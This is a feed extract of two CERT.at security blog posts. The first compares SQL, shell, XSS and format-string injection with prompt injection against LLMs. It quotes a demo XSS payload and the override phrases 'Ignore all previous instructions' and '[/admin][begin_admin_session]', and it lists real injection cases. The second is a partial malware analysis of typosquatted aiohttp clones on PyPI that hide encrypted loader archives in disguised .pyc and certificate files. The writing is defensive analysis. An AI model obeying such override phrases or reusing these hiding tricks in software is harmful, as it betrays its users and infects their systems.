&lt;p&gt;SQL is a query language for databases: it contains both keywords like &quot;SELECT&quot;, &quot;WHERE&quot; as well as the possibility to convey arguments. That may be simple and intuitive for numerical or Boolean values, e.g.&lt;/p&gt;&#13;
&lt;p&gt;&quot;select * from users where disabled = false and age &amp;gt; 18&quot;&lt;/p&gt;&#13;
&lt;p&gt;but once strings are involved, things start to get tricky. The query&lt;/p&gt;&#13;
&lt;pre&gt;select street from restaurants where name = 'Zur Post'&lt;/pre&gt;&#13;
&lt;p&gt;is simple enough, but what about names like &quot;Fred's Pizza&quot;? Then we run in the old issue of having to escape meta-characters. You need to tell the SQL parser that the single-quote symbol in the string is not denoting the end of the string but is actually part of the string. You're just quoting the ', and you are not saying it as part of the SQL statement's syntax.&lt;/p&gt;&#13;
&lt;p&gt;Taking user input and directly dropping it into an SQL query opens your application up for an inject attack: if the attacker includes a single quote, the rest of the argument turns from being treated as a simple sequence of characters into a SQL command.&lt;/p&gt;&#13;
&lt;p&gt;What are the countermeasures here? The obvious one is to correctly escape the string before putting it in the query. Yes, but the better solution is to use prepared statements and thus never put a user-supplied string into a query at all. Or sidestep the problem completely by using an ORM which gives you a nice object-oriented interface for the storage of data - obliviating the need to write SQL queries.&lt;/p&gt;&#13;
&lt;p&gt;As a band-aid or second line of defence, a Web Application Firewall (WAF) can try to prevent any input that looks like it might be an injection attack, from even reaching your webserver.&lt;/p&gt;&#13;
&lt;h1&gt;Shell injection&lt;/h1&gt;&#13;
&lt;p&gt;The same applies to applications that take input from the network and turn them into a command-line parameter. If you are directly calling the other program and handing over its parameters as an array of strings. (e.g., e.g. using the Posix execl system call) you should be fine, but if you're just building a full command line to be passed to system(), then the C library will call a shell which then parses the full string into the positional arguments and starts the desired command.&lt;/p&gt;&#13;
&lt;p&gt;But the shell is powerful. It will replace variables like $PWD and even execute command when the idioms ``` command``&amp;nbsp; and $(command) are used. Thus, if you just simply take a parameter from the network and dump it into the argument for a system() call, you just build a remote code execution vulnerability.&lt;/p&gt;&#13;
&lt;p&gt;The recommendations here are a) avoid invoking via a shell, and b) do heavy duty input filtering (optimally by just allowing a safe set of characters). I really don't recommend trying to escape all possible shell meta-characters.&lt;/p&gt;&#13;
&lt;p&gt;And yes, a WAF might also catch some of these attacks.&lt;/p&gt;&#13;
&lt;h1&gt;Cross Site Scripting (XSS)&lt;/h1&gt;&#13;
&lt;p&gt;HTML is yet another language that mixes content and control instructions which are either XMl-style tags like &quot;&amp;lt;p&amp;gt;&quot; or character references like &quot;&amp;amp;auml:&quot;. That means that &amp;lt;, &amp;gt;, and &amp;amp; are special characters which need to be escaped if they should appear themselves in a document.&lt;/p&gt;&#13;
&lt;p&gt;The most basic XSS vulnerability is a simple search field in a web page. The results page usually contains language like &quot;You search for YOUR_INPUT found the following hit&quot; following by a list of links. If the search query is echoed back verbatim here, then a search for &quot;&amp;lt;script&amp;gt;alert(&quot;XSS&quot;);&amp;lt;/script&amp;gt;&quot; will include this script as an active command for the browser and will trigger an alert dialog. To avoid this issue, the control characters need to be escape, e.g., by replacing &amp;lt; with &amp;amp;lt;.&lt;/p&gt;&#13;
&lt;p&gt;Modern web frameworks handle all this correctly and will automatically escape text inserted into a generated webpage - unless the code explicitly indicates that yes, there really should be active code added to the page.&lt;/p&gt;&#13;
&lt;p&gt;Again, a WAF might help here, too.&lt;/p&gt;&#13;
&lt;h1&gt;String Substitutions&lt;/h1&gt;&#13;
&lt;p&gt;In multiple systems and setups, strings of characters are not only a passive text, but can also contain processing instructions. A really old example is the format string in the printf() function of the C library. For example:&lt;/p&gt;&#13;
&lt;pre&gt;printf(&quot;This is an integer: %i\nAnd this is a string %s\n&quot;, i, str);&lt;/pre&gt;&#13;
&lt;p&gt;will insert a textual representation of a number and a string into the format string, replace the \n with the newline character and send the result to the standard output. So far, so harmless. But what happens when a coder uses printf(str) instead of printf(&quot;%s&quot;, str)? If someone manages to smuggle printf substitution codes into str, then the printf function will follow an undefined pointer and will print some random data from the memory of the program.&lt;/p&gt;&#13;
&lt;p&gt;Much worse, the Java logging framework &quot;log4j&quot; also implements variable substitution when processing events. One of these substitutions was so powerful that it led to remote code execution when data from the network was not carefully handled. Known as &quot;log4shell&quot;, this vulnerability caused a frantic search for affected systems in late 2021.&lt;/p&gt;&#13;
&lt;h1&gt;Mixing data and code&lt;/h1&gt;&#13;
&lt;p&gt;This is slightly different: this is not about programming errors, but about bad design decisions and the resulting human errors. There is thus no &quot;this is how you need to code to avoid that type of error&quot;.&lt;/p&gt;&#13;
&lt;h2&gt;Macros&lt;/h2&gt;&#13;
&lt;p&gt;The possibility to add code to office documents, e.g. to enhance the built-in function or to enable crude automation workflows, was perhaps well intended, but very much ill conceived. It turned something that users mainly saw as passive documents, into executed code with full access to the current user's account. It took Microsoft ages, and its customers an uncountable numbers of malware infections and ransomware incidents, to rectify that initial mistake. Now &quot;.docx&quot; files are not allowed to contain macros, their execution is disabled by default, macros can be signed, and the mark-of-the-web adds another minor layer of protection.&lt;/p&gt;&#13;
&lt;h3&gt;LNK Files&lt;/h3&gt;&#13;
&lt;p&gt;Here, again, Microsoft's drive for ever more features backfired on the user's security. Instead of just implementing the functionality of symbolic links on top of filesystems that don't natively support them, it created the .lnk File in all its glory. Someone really clever in Redmond apparently said: &quot;Why don't we just not only enable referring to an executable, but also add the option of passing command-line arguments to it?&quot;&lt;/p&gt;&#13;
&lt;p&gt;What they missed is the fact that this turned .lnk into the old &quot;how much code can you fit into one line&quot; challenge from bygone eras. By linking to powershell.exe and passing a short program on the command line, a .lnk is basically a program file. It should be treated with the &lt;a href=&quot;https://unit42.paloaltonetworks.com/lnk-malware/&quot;&gt;same caution as a .bat or .exe file.&lt;/a&gt;&lt;/p&gt;&#13;
&lt;h2&gt;Adding JavaScript&lt;/h2&gt;&#13;
&lt;p&gt;Sigh.&lt;/p&gt;&#13;
&lt;p&gt;Initially, HTML was a static document markup language. There was no interactivity, not even the responsiveness that modern CSS offers. Thus, these files were harmless. There was no code, opening them either opened an editor or a browser to render them.&lt;/p&gt;&#13;
&lt;p&gt;With the inclusion of JavaScript (let's just ignore Java Applets, Flash, Silverlight and other abominations) changed all this. First, a static website just got a bit more interactive and before long, modern Websites are full-blown applications which are downloaded into and executed by your browser. In some ways, the browser is the new operating system, good examples are the Google suite of applications and the re-implementation of early 2000 games in WebAssembly.&lt;/p&gt;&#13;
&lt;p&gt;Vulnerabilities in the browser which let code jump out of the JavaScript sandbox and infect the operating system with malware have been a frequent security threat over the last 20 years. It seems to get a bit better, but that may also be due to the fact that browsers are patched on a very aggressive schedule. E.g., Microsoft Edge is not waiting for the next Patch Tuesday before asking the user for a restart to apply a patch.&lt;/p&gt;&#13;
&lt;p&gt;For a while, opening local html files with a browser led to a very generous interpretation of the Same-Origin Policy giving the embedded JavaScript way too many permissions. The old Microsoft Internet Explorer included a zone model giving webpages from (hopefully justifiably) trusted servers additional permission.&lt;/p&gt;&#13;
&lt;p&gt;All in all, the gradual transformation from static HTML to a single-page JavaScript application led to numerous misinterpretations of security properties and led to a slew of vulnerabilities.&lt;/p&gt;&#13;
&lt;p&gt;But it's not just HTML that was spiced up with JavaScript. PDF and SVG got the same treatment with similar security impact. Regrettably, there is no .pdfx vs. pdfm distinction to give users a chance to know which document contains code and which doesn't.&lt;/p&gt;&#13;
&lt;h1&gt;Prompt Injection&lt;/h1&gt;&#13;
&lt;p&gt;One of the new and interesting properties of LLM and assorted chat-bots is the fact that you communicate with them in your native language, e.g., English. You no longer need to tell the computer in some special language what to do, there is no need to learn SQL, C, JavaScript, Python, Java or Rust anymore, instead the LLM will do the translation from the human world itself. This is, of course, hugely transformative as the hurdle to make use of an LLM-assistant dropped by quite a lot.&lt;/p&gt;&#13;
&lt;p&gt;But the human language is tricky. The grammar is not as strict as with the formal computer languages. Forget about understanding irony or humour. And, most importantly, common sense.&lt;/p&gt;&#13;
&lt;p&gt;In a way, these chatbots can feel like a very powerful co-worker that you can ask for assistance. The &quot;Co-Pilot&quot; branding for Microsoft's offering also suggests this. But this co-worker is on a very different mental spectrum than any functional real human. It has a very limited understanding of the subtleties and the context of all the input it processes.&lt;/p&gt;&#13;
&lt;p&gt;All this reminds me of a phishing incident I heard of a few years back: A CEO received a phishing mail just forwarded it to the secretary with a vague &quot;please handle this&quot;, meaning &quot;take a look at it, determine the mail's validity and act accordingly&quot; whereas the secretary understood &quot;please execute what this mail demands&quot;.&lt;/p&gt;&#13;
&lt;p&gt;This is exactly where we are with LLMs: we're handing it data to process and act upon, and we hope that it can understand the difference between &quot;Read this text and be sensible and cautious in what you do with it&quot; and &quot;follow the orders contained in this text&quot;.&lt;/p&gt;&#13;
&lt;p&gt;All of this is happening in English, German or other human languages. Which means:&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li&gt;It can be imprecise and ambiguous.&lt;/li&gt;&#13;
&lt;li&gt;The interpretation may depend a lot on context.&lt;/li&gt;&#13;
&lt;li&gt;It can be plain text, but it can also be hidden in pictures. Both easily visible, but also in a way a human can't see it as clearly as the LLM.&lt;/li&gt;&#13;
&lt;li&gt;It's not a formal language where you can easily spot the code. Python, C, SQL or even Cobol can be easily detected, filtered and made inert.&lt;/li&gt;&#13;
&lt;li&gt;Quoting rules can already be tricky with formal languages (e.g., writing makefiles that execute commands with non-trivial shell features like backticks, variables and single and double quotes). Are there even formal definitions on how quoting should work for LLMs? Are they standardized?&lt;/li&gt;&#13;
&lt;li&gt;We're completely blurring the line between code and data. Both is text.&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;p&gt;This has gone wrong already, and these issues will be serious vulnerabilities going forward.&lt;/p&gt;&#13;
&lt;h2&gt;What have we seen?&lt;/h2&gt;&#13;
&lt;p&gt;This is certainly not an exhaustive list, but only a collection of what I remember reading about and/or noted down a link for it.&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li&gt;&lt;a href=&quot;https://knowyourmeme.com/memes/ignore-all-previous-instructions&quot;&gt;Twitter bots&lt;/a&gt; Answering with &quot;Ignore all previous instructions and &amp;hellip;&quot; caused LLM-driven bots to execute the instruction.&lt;/li&gt;&#13;
&lt;li&gt;&lt;a href=&quot;https://www.linkedin.com/feed/update/urn:li:activity:7376238154787364864/&quot;&gt;LinkedIn Info scraped by bots&lt;/a&gt; This time, &quot;[/admin][begin_admin_session]&quot; was used to get bots to treat the following English text as a command.&lt;/li&gt;&#13;
&lt;li&gt;&lt;a href=&quot;https://www.bleepingcomputer.com/news/security/new-ai-attack-hides-data-theft-prompts-in-downscaled-images/&quot;&gt;Instructions hidden in an image&lt;/a&gt; Using downscaling to reveal the command.&lt;/li&gt;&#13;
&lt;li&gt;&lt;a href=&quot;https://securetrajectories.substack.com/p/claude-skill-hijack-invisible-sentence&quot;&gt;Injecting instructions with white-on-white text&lt;/a&gt; This time, the target is a Claude Skill.&lt;/li&gt;&#13;
&lt;li&gt;&lt;a href=&quot;https://embracethered.com/blog/posts/2024/ascii-smuggling-and-hidden-prompt-instructions/&quot;&gt;Unicode Tag Characters and ASCII Smuggling&lt;/a&gt; Which could be used to trick &lt;a href=&quot;https://embracethered.com/blog/posts/2024/whoami-conditional-prompt-injection-instructions/&quot;&gt;Copilot to execute commands&lt;/a&gt;.&lt;/li&gt;&#13;
&lt;li&gt;LLMs as Ransomware actors (&lt;a href=&quot;https://engineering.nyu.edu/news/large-language-models-can-execute-complete-ransomware-attacks-autonomously-nyu-tandon-research&quot;&gt;Research note&lt;/a&gt;, &lt;a href=&quot;https://www.eset.com/gr-en/about/newsroom/press-releases-1/eset-discovers-promptlock-the-first-ai-powered-ransomware-1/&quot;&gt;industry reaction&lt;/a&gt;) This was not a real-world attack, but for me this shows a completely new way to smuggle code in a target environment: Just convey what you want to achieve in English and let an LLM agent do the coding on demand.&lt;/li&gt;&#13;
&lt;li&gt;&lt;a href=&quot;https://www.heise.de/en/news/Grammatical-errors-make-prompt-injections-more-likely-10623349.html&quot;&gt;Writing long text without punctuation&lt;/a&gt; Apparently, that can overload the context windows of LLMs.&lt;/li&gt;&#13;
&lt;li&gt;&lt;a href=&quot;https://brave.com/series/security-privacy-in-agentic-browsing/&quot;&gt;Agentic Webbrowsers have issues&lt;/a&gt; Whether they are summarizing webpages, parse hidden html tags or screenshots, traditional web security assumptions do not hold.&lt;/li&gt;&#13;
&lt;li&gt;&lt;a href=&quot;https://thehackernews.com/2025/09/researchers-disclose-google-gemini-ai.html&quot;&gt;Google Gemeni also was affected&lt;/a&gt; Three vulnerabilities were found.&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;p&gt;Thomas Roccia publishes a &lt;a href=&quot;https://jupyter.securitybreak.io/IoPC/AdversarialPrompts.html&quot;&gt;nice classification of Adversarial Prompts&lt;/a&gt; on SecurityBreak.io. Currently, he lists 38 vectors in four categories.&lt;/p&gt;&#13;
&lt;h2&gt;What can we expect?&lt;/h2&gt;&#13;
&lt;p&gt;The team from Brave &lt;a href=&quot;https://brave.com/blog/unseeable-prompt-injections/&quot;&gt;found this consistent theme&lt;/a&gt; in agentic browsing vulnerabilities:&lt;/p&gt;&#13;
&lt;p style=&quot;padding-left: 30px;&quot;&gt;Readers will note that each of these attacks look similar. Fundamentally, they boil down to a failure to maintain clear boundaries between trusted user input and untrusted Web content when constructing LLM prompts while allowing the browser to take powerful actions on behalf of the user.&lt;/p&gt;&#13;
&lt;p style=&quot;padding-left: 30px;&quot;&gt;We recognize that this is a hard problem, and we have some longer-term ideas that we're exploring in collaboration with our &lt;a href=&quot;https://brave.com/research/&quot;&gt;research&lt;/a&gt; and security teams to address such problems. But until we have categorical safety improvements (i.e., across the browser landscape), agentic browsing will be inherently dangerous and should be treated as such. In the meantime, browsers should isolate agentic browsing from regular browsing and initiate agentic browsing actions (opening websites, reading emails, etc.) only when the user explicitly invokes them.&lt;/p&gt;&#13;
&lt;p&gt;This is a good summary, and it applies in similar fashion to other applications of LLMs that deal with user-supplied input as well.&lt;/p&gt;&#13;
&lt;p&gt;There will be no simple solution.&lt;/p&gt;&#13;
&lt;p&gt;If we look back to the long list of non-LLM solutions, we can check some of the solutions developed there can help us going forward. Let's see:&lt;/p&gt;&#13;
&lt;p&gt;&lt;strong&gt;Separate control instructions from data:&lt;/strong&gt; This is tricky. Both can be English text. There is no (or at least not always) clear protocol framing that separates these two. People are mucking with quotation marks and other in-band framing band-aid. I haven't seen the equivalent of an SQL prepared statement.&lt;/p&gt;&#13;
&lt;p&gt;&lt;strong&gt;Filtering out malicious code:&lt;/strong&gt; We probably already failing at &quot;detecting code&quot; now. Almost any English text can be an instruction for an LLM. Tuning WAFs is tricky enough but think about what it would take to have a border-device screen any incoming text for potential prompt injection. That would need yet another LLM to do natural language processing. This will not work.&lt;/p&gt;&#13;
&lt;p&gt;Look at this evolution in threat actor tooling:&lt;/p&gt;&#13;
&lt;ol&gt;&#13;
&lt;li&gt;They brought their own tools (for remote access, lateral movement, encryption, &amp;hellip;): Pattern-based AV had at least a chance.&lt;/li&gt;&#13;
&lt;li&gt;They switched to &quot;living of the land&quot;: just bring scripts to control legitimate administrative tools that are already present: Maybe the execution of these scripts can be detected.&lt;/li&gt;&#13;
&lt;li&gt;(coming) Just bring the right prompts to local LLM agents. No need for tool downloads or fancy command lines. Just plain text and maybe a creative way to feed that text to the LLM. This will be &quot;living of the land&quot; on steroids&lt;/li&gt;&#13;
&lt;/ol&gt;&#13;
&lt;p&gt;&lt;strong&gt;Restrict what LLMs are allowed do:&lt;/strong&gt; If you give your agentic LLM your own rights/permissions, then any mistake the LLM makes can do serious harm. The probably right way (but horribly complex) way to deal with this are granular permissions. Maybe the LLM is allowed to propose a calendar entry based on the e-mail it processed, but deleting appointments is a step too far. You should treat your LLM as a very enthusiastic intern. It's fine to delegate a lot of work to him, but don't hand him the keys to your kingdom.&lt;/p&gt;&#13;
&lt;p&gt;&lt;strong&gt;The guardrails need to be external:&lt;/strong&gt; Just telling the LLM what it should do before inputting the network-supplied content might not be sufficient as it is impossible to rule out prompt injections. So maybe you need a second LLM just as an overseer of the main LLM. Even better, that control module could contain hardcoded deterministic (i.e., old-school software) controls that restrict the behaviour of your agentic LLM.&lt;/p&gt;&#13;
&lt;h1&gt;Summary&lt;/h1&gt;&#13;
&lt;p&gt;With LLMs, we're running into the same fundamental issues that have plagued IT security for the last 50 years. We're making the same mistakes again, and this time they are inherent to the LLM technology and thus they are even harder to tackle.&lt;/p&gt;&#13;
&lt;p&gt;In other words, LLM security will be really hard to get right.&lt;/p&gt;&#13;
&lt;p&gt;It is about to get worse.&lt;/p&gt;</description><pubDate>Tue, 02 Dec 2025 16:59:09 GMT+0100</pubDate><guid>https://www.cert.at/en/blog/2025/12/dont-say-jehova-to-an-llm</guid><dc:creator>CERT.at</dc:creator><dc:date>2025-12-02T16:59:09Z</dc:date></item><item><title>How typosquatting tricked me (a bit)</title><link>https://www.cert.at/en/blog/2025/10/how-typosquatting-tricked-me-a-bit</link><description>&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;Typosquatting [1] is a popular method using similarly looking names to draw people into malicious content &amp;ndash; such as phishing websites or fake software packages. It leverages our &amp;ldquo;brain optimization&amp;rdquo; that matches what we see with what we already know &amp;ndash; even if it&amp;rsquo;s not exactly the same. I haven&amp;rsquo;t installed any shady software, but it&amp;rsquo;s still a good example how easily our brain could be used against us by utilizing our biases.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;The story started a few days ago, when I was looking into alerts generated by my automated analysis of packages uploaded to the Python Package Index (PyPI). I don&amp;rsquo;t have much time recently, so I don&amp;rsquo;t review all of them &amp;ndash; but this one immediately caught my attention:&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: center;&quot;&gt;&lt;img src=&quot;https://www.cert.at/media/files/news/blog/20251029-asynhttp/01-alert.png&quot; alt=&quot;&quot; width=&quot;956&quot; height=&quot;131&quot; /&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;The name is obvious typosquatting (in this case my human-typosquatting-detector still worked well), so I had to look inside. The alert had actually been triggered by a rather generic rule &amp;ndash; I&amp;rsquo;ve even considered lowering its severity recently. However, in the files tree something immediately looked wrong:&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: center;&quot;&gt;&lt;img src=&quot;https://www.cert.at/media/files/news/blog/20251029-asynhttp/02-listing.png&quot; alt=&quot;Files listing in the asynhttp package&quot; width=&quot;541&quot; height=&quot;285&quot; /&gt;&lt;br /&gt;&lt;em&gt;Files listing in the &lt;/em&gt;&lt;code&gt;asynhttp&lt;/code&gt;&lt;em&gt; package&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;The &lt;code&gt;__pycache__&lt;/code&gt; directory is a place where Python stores the source code compiled to the bytecode format, in the form of files with the PYC extension, to speedup subsequent executions. This is usually used just locally, and rather useless when included in a package &amp;ndash; the Python interpreter will most probably treat them as outdated and recompile the code anyway. Yet, it happens from time to time that they are accidentally included in published packages.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;But what do we see here? A PYC file that has been identified as a ZIP archive which contains a few Python source code files &amp;ndash; this is not how it works. Looking at the code, the flagged &lt;code&gt;https.py&lt;/code&gt;&amp;nbsp;was immediately confirmed to be suspicious. I quickly found out that it implements some encryption and modifies the files of another package, implementing the Happy Eyeballs protocol [2]:&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: center;&quot;&gt;&lt;img src=&quot;https://www.cert.at/media/files/news/blog/20251029-asynhttp/03-listing-removing-files.png&quot; alt=&quot;A cut from the &amp;ldquo;https.py&amp;rdquo;, where files belonging to another package are removed&quot; width=&quot;733&quot; height=&quot;220&quot; /&gt;&lt;br /&gt;&lt;em&gt;A cut from the &lt;code&gt;https.py&lt;/code&gt;, where files belonging to another package are removed&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;Now that&amp;nbsp;I knew enough to confirm it was malicious, I also found the entry point where this code was loaded. In a class definition in the&amp;nbsp;&lt;code&gt;web_routedef.py&lt;/code&gt;, the ZIP archive was loaded in as a Python module (this is actually supported by the Python standard library, yet rarely used in 3rd party packages). The package itself is a copy of &lt;code&gt;aiohttp&lt;/code&gt; [3], a popular HTTP implementation.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: center;&quot;&gt;&lt;img src=&quot;https://www.cert.at/media/files/news/blog/20251029-asynhttp/04-web_routedef1.png&quot; alt=&quot;Listings from modified &amp;ldquo;web_routedef.py&amp;rdquo;. In line 22 the function to import modules from ZIP archives is imported and renamed, and then used in line 193 to load the malicious code&quot; width=&quot;600&quot; height=&quot;49&quot; /&gt;&lt;br /&gt;&lt;img src=&quot;https://www.cert.at/media/files/news/blog/20251029-asynhttp/05-web_routedef2.png&quot; alt=&quot;Listings from modified &amp;ldquo;web_routedef.py&amp;rdquo;. In line 22 the function to import modules from ZIP archives is imported and renamed, and then used in line 193 to load the malicious code&quot; width=&quot;725&quot; height=&quot;255&quot; /&gt;&lt;br /&gt;&lt;em&gt;Listings from modified&amp;nbsp;&lt;code&gt;web_routedef.py&lt;/code&gt;. In line 22 the function to import modules from ZIP archives is imported and renamed, and then used in line 193 to load the malicious code&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;I was in a rush, so I didn&amp;rsquo;t dig deeper &amp;ndash; this was enough for the report. The package was quickly removed from PyPI. Soon afterwards, it came back under different name, a process that was repeated a few times. This is quite typical, Threat Actors often try uploading almost the same package after the removal of the previous one. I can imagine a few reasons why, but changing the package name definitely won&amp;rsquo;t help it stay undetected next time. Here, they also experimented with different loaders and places to hide the malicious code. For example, in&amp;nbsp;&lt;code&gt;aiohttp-ssl&lt;/code&gt; and&amp;nbsp;&lt;code&gt;aiohttp-openssl&lt;/code&gt;, the archive was disguised as a certificate and loaded during executing a method:&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: center;&quot;&gt;&lt;img src=&quot;https://www.cert.at/media/files/news/blog/20251029-asynhttp/06-aiohttp-ssl.png&quot; alt=&quot;Listing from the &amp;ldquo;aiohttp-ssl&amp;rdquo; and &amp;ldquo;aiohttp-openssl&amp;rdquo; packages &amp;ndash; the archive is now named &amp;ldquo;server.crt&amp;rdquo; and the malicious code is in &amp;ldquo;SSLv2.py&amp;rdquo;&quot; width=&quot;301&quot; height=&quot;151&quot; /&gt;&lt;br /&gt;&lt;em&gt;Listing from the&amp;nbsp;&lt;code&gt;aiohttp-ssl&lt;/code&gt; and &lt;code&gt;aiohttp-openssl&lt;/code&gt; packages &amp;ndash; the archive is now named &lt;code&gt;server.crt&lt;/code&gt; and the malicious code is in &lt;code&gt;SSLv2.py&lt;/code&gt;&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: center;&quot;&gt;&amp;nbsp;&lt;img src=&quot;https://www.cert.at/media/files/news/blog/20251029-asynhttp/07-web_routedef3.png&quot; alt=&quot;In the line 198 of file &amp;ldquo;web_routedef.py&amp;rdquo;, the module from ZIP archive is loaded, which automatically triggers the malicious code&quot; width=&quot;624&quot; height=&quot;103&quot; /&gt;&lt;br /&gt;&lt;em&gt;In the line 198 of file &lt;code&gt;web_routedef.py&lt;/code&gt;, the module from ZIP archive is loaded, which automatically triggers the malicious code&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;And in the newest incarnation, &lt;code&gt;httpserver-cache&lt;/code&gt;, the archive has been renamed to look like a file with the types definition, and the loading code has been separated between two files: in &lt;code&gt;typedefs.py&lt;/code&gt; the archive is added to the list of paths where Python looks for modules to import, and the importing is triggered again in the &lt;code&gt;web_routedef.py&lt;/code&gt;:&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: center;&quot;&gt;&lt;img src=&quot;https://www.cert.at/media/files/news/blog/20251029-asynhttp/08-falcon.png&quot; alt=&quot;File listing from the httpserver-cache, the ZIP archive is renamed as &amp;ldquo;_websocket.typed&amp;rdquo; and the malicious code is now in the &amp;ldquo;falcon.py&amp;rdquo;&quot; width=&quot;483&quot; height=&quot;152&quot; /&gt;&lt;br /&gt;&lt;em&gt;File listing from the &lt;code&gt;httpserver-cache&lt;/code&gt;, the ZIP archive is renamed as &lt;code&gt;_websocket.typed&lt;/code&gt; and the malicious code is now in the &lt;code&gt;falcon.py&lt;/code&gt;&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: center;&quot;&gt;&lt;img src=&quot;https://www.cert.at/media/files/news/blog/20251029-asynhttp/09-typedefs.png&quot; alt=&quot;In line 61 of &amp;ldquo;typedefs.py&amp;rdquo;, the ZIP archive is added to the paths where Python looks for modules&quot; width=&quot;670&quot; height=&quot;105&quot; /&gt;&lt;br /&gt;&lt;em&gt;In line 61 of &lt;code&gt;typedefs.py&lt;/code&gt;, the ZIP archive is added to the paths where Python looks for modules&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: center;&quot;&gt;&lt;img src=&quot;https://www.cert.at/media/files/news/blog/20251029-asynhttp/10-import-falcon.png&quot; alt=&quot;In line 29 of &amp;ldquo;web_routedef.py&amp;rdquo;, the malicious module is imported. As the typedefs was imported earlier, Python will now find falcon module in the ZIP archive &quot; width=&quot;212&quot; height=&quot;51&quot; /&gt;&lt;br /&gt;&lt;em&gt;In line 29 of &lt;code&gt;web_routedef.py&lt;/code&gt;, the malicious module is imported. As the &lt;code&gt;typedefs&lt;/code&gt; was imported earlier, Python will now find &lt;code&gt;falcon&lt;/code&gt; module in the ZIP archive&lt;/em&gt;&lt;/p&gt;&#13;
&lt;h1 class=&quot;block&quot; style=&quot;text-align: left;&quot;&gt;Where is the trick?&lt;/h1&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;Have you already noticed a trick that I&amp;rsquo;ve overlooked in a rush? While looking for the loading code in the last package, I compared its code with the original &lt;code&gt;aiohttp&lt;/code&gt;. Besides the already mentioned loading methods, it also reveals that Happy Eyeballs lost the &amp;ldquo;s&amp;rdquo;...&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: center;&quot;&gt;&lt;img src=&quot;https://www.cert.at/media/files/news/blog/20251029-asynhttp/11-diff.png&quot; alt=&quot;Differences in the connector.py file between the original aiohttp and malicious clone httpserver-cache &quot; width=&quot;916&quot; height=&quot;425&quot; /&gt;&lt;br /&gt;&lt;em&gt;Differences in the connector.py file between the original &lt;code&gt;aiohttp&lt;/code&gt; and malicious clone &lt;code&gt;httpserver-cache&lt;/code&gt;&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;This was the first trick. I opened the &lt;code&gt;aiohappyeyeball&lt;/code&gt; to see that it was also uploaded a few days ago and is a copy of the legitimate &lt;code&gt;aiohappyeyeballs&lt;/code&gt; [4]. This package did not trigger any alert in my system, but looking at the file listing I again saw a suspicious PYC file, that this time wasn&amp;rsquo;t recognized as any file type. There was also nothing readable inside &amp;ndash; just some binary data.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: center;&quot;&gt;&lt;img src=&quot;https://www.cert.at/media/files/news/blog/20251029-asynhttp/11-aiohappyeyeball.png&quot; alt=&quot;Listing of files in the aiohappyeyeball package&quot; width=&quot;462&quot; height=&quot;255&quot; /&gt;&lt;br /&gt;&lt;em&gt;Listing of files in the &lt;code&gt;aiohappyeyeball&lt;/code&gt;&amp;nbsp;package&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;Quick diffing with the original package revealed interesting looking lines:&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: center;&quot;&gt;&lt;img src=&quot;https://www.cert.at/media/files/news/blog/20251029-asynhttp/12-pycached.png&quot; alt=&quot;&quot; width=&quot;811&quot; height=&quot;173&quot; /&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;I did not recognize &lt;code&gt;__directory__&lt;/code&gt; nor &lt;code&gt;__pycached__&lt;/code&gt; as any known variables, but it looked like a loading method I didn&amp;rsquo;t know yet &amp;ndash; so I started digging into what is in the &lt;code&gt;staggerd.pyc&lt;/code&gt;. I have ruled out real Python bytecode, and suspected a native extension module [10] &amp;ndash; however, they should export some methods. At this point I even started asking for help. Until I thought about looking at the code from the ZIP-archives once again and realized that they managed to trick me once more.&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;How does it work?&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;There is no magic way in the&amp;nbsp;&lt;code&gt;aiohappyeyeball&lt;/code&gt; to load the binary file. It acts just as storage, and the &lt;code&gt;staggerd.pyc&lt;/code&gt; is an encrypted blob. The decryption is implemented in other packages. The encryption algorithm is implemented without using any dependencies outside the standard library.&amp;nbsp;&lt;/p&gt;&#13;
